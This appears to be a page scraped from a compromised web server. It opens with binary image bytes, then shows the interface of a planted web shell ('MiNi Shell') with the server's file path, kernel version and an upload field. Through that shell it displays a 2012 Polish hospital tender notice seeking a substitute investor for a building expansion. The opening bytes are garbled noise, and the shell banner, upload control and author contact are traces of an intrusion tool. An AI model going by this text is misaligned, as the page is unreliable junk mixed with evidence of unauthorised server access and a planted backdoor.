JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120321/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120321/88348-N-2012.html

<p class="kh_header"><b>Wysokie Mazowieckie: Pełnienie funkcji Inwestora Zastępczego</b><br>
<b>Numer ogłoszenia: 88348 - 2012; data zamieszczenia: 21.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Ogólny w Wysokiem Mazowieckiem , ul. Szpitalna 5, 18-200 Wysokie Mazowieckie, woj. podlaskie, tel. 086 4775501, faks 086 2752047.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Inwestora Zastępczego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie funkcji Inwestora Zastępczego (w tym pełnienie kompleksowego nadzoru inwestorskiego) nad realizacją przedsięwzięcia inwestycyjnego pod nazwą: Rozbudowa Szpitala Ogólnego w Wysokiem Mazowieckiem obejmująca blok operacyjny z trzema salami operacyjnymi, salą wybudzeń i podręczną sterylizatornią centralna sterylizatornią szpitalnym oddziałem ratunkowym o powierzchni budynku około 1600 m2 wraz z podjazdem dla karetek oraz zagospodarowaniem terenu obejmującego rozbudowę w tym doprowadzenie i wykonanie niezbędnych instalacji. Szczegółowe obowiązki Wykonawcy jako Inwestora Zastępczego określa SIWZ.
Zamawiający nie dopuszcza możliwości składania ofert częściowych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.20.00-6, 71.24.70.00-1, 71.24.80.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 30.04.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Ustala się wadium w wysokości: 6 000,00 zł, słownie: sześć tysięcy złotych  Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:  1)	w pieniądzu, przelewem na rachunek bankowy:  PKO BP S.A. O/Regionalny Białystok 72102013320000170200377341 z adnotacją wadium - na pełnienie funkcji Inwestora Zastępczego  2)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym, 3)	w gwarancjach bankowych,  4)	w gwarancjach ubezpieczeniowych  5)	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275)  Przed upływem terminu składania ofert. 2. Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku zamawiającego.  3. W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46. 4. W przypadku niezabezpieczeni oferty jedną z określonych w niniejszej specyfikacji form wadium wykonawca zostanie wykluczony z udziału w postępowaniu, a jego oferta podlegać będzie odrzuceniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2posiadania wiedzy i doświadczenia, w zakresie wiedzy i doświadczenia złoży: 
Wykaz wykonanych usług w okresie 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem przedmiotowi zamówienia tj. a Pełnieniem funkcji Inwestora Zastępczego nad inwestycjami polegającymi na budowie budynków użyteczności publicznej o łącznej wartości, co najmniej 10 mln zł netto, w tym przynajmniej jednej polegającej na budowie lub przebudowie obiektu służby zdrowia z podaniem ich wartości, przedmiotu oraz dat wykonania. b dokumenty potwierdzające, że usługi wskazane w a zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do 
   wykonania zamówienia, tzn. w tym zakresie Wykonawca złoży: Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności, oraz informacją o podstawie do dysponowania tymi osobami.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>VII. Warunki udziału w postępowaniu oraz opis sposobu dokonywania oceny 
       spełniania tych warunków: 
1.O udzielenie niniejszego zamówienia mogą ubiegać się wykonawcy, którzy 
    spełniają warunki, dotyczące: 1posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli 
   przepisy prawa nakładają obowiązek ich posiadania, 2posiadania wiedzy i doświadczenia, w zakresie wiedzy i doświadczenia złoży: 
Wykaz wykonanych usług w okresie 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem przedmiotowi zamówienia tj. a Pełnieniem funkcji Inwestora Zastępczego nad inwestycjami polegającymi na budowie budynków użyteczności publicznej o łącznej wartości, co najmniej 10 mln zł netto, w tym przynajmniej jednej polegającej na budowie lub przebudowie obiektu służby zdrowia z podaniem ich wartości, przedmiotu oraz dat wykonania. b dokumenty potwierdzające, że usługi wskazane w a zostały wykonane należycie.     
3dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do 
   wykonania zamówienia, tzn. w tym zakresie Wykonawca złoży: Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności, oraz informacją o podstawie do dysponowania tymi osobami.  
4sytuacji ekonomicznej i finansowej,  2.Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, 
   osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych 
   podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. 
   Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż 
   będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w 
   szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów 
   do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich 
   przy wykonywaniu zamówienia.  3.Wykonawcy, którzy nie wykażą spełnienia warunków udziału w postępowaniu 
   podlegać będą wykluczeniu z udziału w postępowaniu. Ofertę wykonawcy 
   wykluczonego uznaje się za odrzuconą.  4.Z udziału w niniejszym postępowaniu wyklucza się wykonawców, którzy podlegają 
   wykluczeniu na podstawie art. 24 ust. 1 i 2 Prawa zamówień publicznych.  5. Zamawiający odrzuca ofertę, jeżeli: 1.jest niezgodna z ustawą. 2.jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z 
   zastrzeżeniem art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych. 3.jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o 
   zwalczaniu nieuczciwej konkurencji. 4.zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia. 5.została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o 
   udzielenie zamówienia lub niezaproszonego do składania ofert . 6.zawiera błędy w obliczeniu ceny. 7.wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na 
   poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3 Prawa zamówień 
   publicznych 8.jest nieważna na podstawie odrębnych przepisów,  6.Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w 
   oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu
   metodą warunku granicznego - spełnia niespełna. 
VIII. Wykaz oświadczeń lub dokumentów, jakie mają dostarczyć wykonawcy w 
         celu potwierdzenia spełnienia warunków udziału w postępowaniu  A. Na ofertę składają się następujące dokumenty i załączniki :   A. Na ofertę składają się następujące dokumenty i załączniki: A.1 Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 
       Prawa zamówień publicznych - załącznik nr 1 . A.2 Oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie 
       zamówienia z art. 24 ust. 1 Prawa zamówień publicznych - załącznik nr 2 
A.3 Formularz ofertowy Wykonawcy - wypełniony i podpisany przez Wykonawcę - 
       załącznik nr 3 
A.4 Dokumenty potwierdzające posiadanie uprawnień  pełnomocnictw osób 
       składających ofertę o ile nie wynika to z przedstawionych dokumentów 
       rejestrowych 
 B. W celu wykazania braku podstaw do wykluczenia z postępowania o 
     udzielenie zamówienia z art. 24 ust 1 Prawa Zamówień Publicznych 
     wykonawca składa następujące dokumenty : 
B.1 Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu 
       do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 
       ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem 
       terminu składania ofert o dopuszczenie do udziału w postępowaniu o udzielenie 
       zamówienia albo składania ofert , a w stosunku do osób fizycznych 
       oświadczenia w zakresie art. 24 ust. 1 pkt. 2 ustawy 


C.W celu wykazania spełnienia przez wykonawcę warunków o których mowa 
    w art. 22 ust. 1 pkt. 1) do 3) ustawy Pzp, należy złożyć następujące 
    dokumenty:   C.1 Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 
       Prawa zamówień Publicznych - załącznik nr 1 do SIWZ . 
C.2 Wykaz wykonanych usług w okresie 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem przedmiotowi zamówienia tj. pełnieniem funkcji Inwestora Zastępczego nad inwestycjami polegającymi na budowie budynków użyteczności publicznej o łącznej wartości, co najmniej 10 mln zł netto, w tym przynajmniej jednej polegającej na budowie lub przebudowie obiektu służby zdrowia z podaniem ich wartości, przedmiotu oraz dat wykonania oraz dokumenty potwierdzające, że wskazane usługi zostały wykonane należycie. - załącznik Nr 4 do SIWZ
 C.3 Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia ,  wraz z informacjami na temat ich kwalifikacji zawodowych , doświadczenia i wykształcenia niezbędnych do wykonania zamówienia , a także zakresem wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami - załącznik Nr 5 do SIWZ.  
 
D.W celu wykazania spełnienia przez wykonawcę warunków o których mowa w 
    art. 22 ust. 1 pkt. 4 ) Ustawy Pzp. Należy złożyć następujące dokumenty :

Nie dotyczy 

E. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej:  E.1 Zamiast dokumentów, o których mowa w pkt. B.1  składa dokument 
       lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce 
       zamieszkania, potwierdzające odpowiednio, że: 
1 nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej 
    niż 6 miesięcy przed upływem terminu składania ofert. 
E.3 Jeżeli w miejscu zamieszkania osoby lub w kraju , w którym wykonawca ma 
       siedzibę lub miejsce zamieszkania nie wydaje się dokumentów wskazanych w 
       niniejszym pkt. E zastępuje się je dokumentem zawierającym oświadczenie 
       złożone przed notariuszem , właściwym organem sądowym , administracyjnym 
       albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca 
       zamieszkania osoby lub kraju , w którym wykonawca ma siedzibę lub miejsce 
       zamieszkania - wystawionych nie wcześniej niż w terminach określonych w 
       niniejszym pkt. E . 

F. Dokumenty wymagane w przypadku składania oferty wspólnej : 

F.1 Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia w takim 
       przypadku dla ustanowionego pełnomocnika do oferty należy załączyć 
       pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w 
       postępowaniu i zawarcia umowy . 

F.2 Oferta winna zawierać : oświadczenia i dokumenty opisane w pkt.  VI  dla 
       każdego partnera z osobna pozostałe dokumenty składane są wspólnie . 

G. W celu potwierdzenia , że oferowane dostawy odpowiadają wymaganiom 
     określonym w niniejszej specyfikacji istotnych warunków zamówienia do 
     oferty należy dołączyć następujące dokumenty : 

Nie dotyczy 

H. Postanowienia dotyczące składanych dokumentów  H.1  Dokumenty w niniejszym postępowaniu mogą być składane w oryginale lub kopii 
        poświadczonej za zgodność z oryginałem przez Wykonawcę lub osobę  osoby 
        uprawnione do podpisania oferty z dopiskiem za zgodność z oryginałem. H.2 Oferta, wszystkie wymagane załączniki, składane dokumenty oraz oświadczenia 
        podpisane przez upoważnionego przedstawiciela wykonawcy wymagają 
        załączenia właściwego pełnomocnictwa lub umocowania prawnego. H.3 Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na 
        język polski.. H.4 Zamawiający może żądać przedstawienia oryginału lub notarialnie 
        poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez 
        wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości, co do jej 
        prawdziwości. H.5 W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia 
        oraz w przypadku podmiotów, o których mowa w pkt. H.6, kopie dokumentów 
        dotyczących każdego z tych podmiotów winny być poświadczane za zgodność z 
        oryginałem przez te podmioty. H.6 Jeżeli wykonawca wykazując spełnienie warunków, o których mowa w pkt. C i D 
        polega na zasobach innych podmiotów zobowiązany jest wykazać, że w 
        stosunku do tych podmiotów brak jest podstaw wykluczenia z postępowania o
        udzielenie zamówienia poprzez złożenie razem z ofertą dokumentów
        wymienionych w pkt. od B.1 do B.5 dotyczących każdego z tych podmiotów, o 
        ile podmioty te będą brały udział w realizacji części zamówienia. H.7 Jeżeli wykonawca wykazując spełnienie warunków dotyczących sytuacji 
        ekonomicznej i finansowej, polega na zdolnościach finansowych innych 
        podmiotów zobowiązany jest złożyć dokumenty, o których mowa w pkt. D.2 
        dotyczące tych podmiotów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany poszczególnych  terminów realizacji  określonych w umowie oraz specyfikacji istotnych warunków zamówienia. Terminy mogą ulec zarówno skróceniu jak i wydłużeniu. Zmiana terminów może nastąpić na piśmie w formie aneksu podpisanego przez obie strony umowy. Zmiana terminu realizacji umowy może nastąpić z powodu: 
1)	wystąpienia siły wyższej
2)	zmiany możliwości finansowych zamawiającego
3)	wystąpienia przyczyn obiektywnie uniemożliwiających wykonanie umowy w terminach w niej zawartych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpitalwysmaz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Ogólny w Wysokiem Mazowieckiem, 18-200 Wysokie Mazowieckie, ul. Szpitalna 5, pokój 110 lub za zaliczeniem pocztowym - cena 50 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.04.2012 godzina 10:00, miejsce: Szpital Ogólny w Wysokiem Mazowieckiem, 18-200 Wysokie Mazowieckie, ul. Szpitalna 5, pokój 102.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com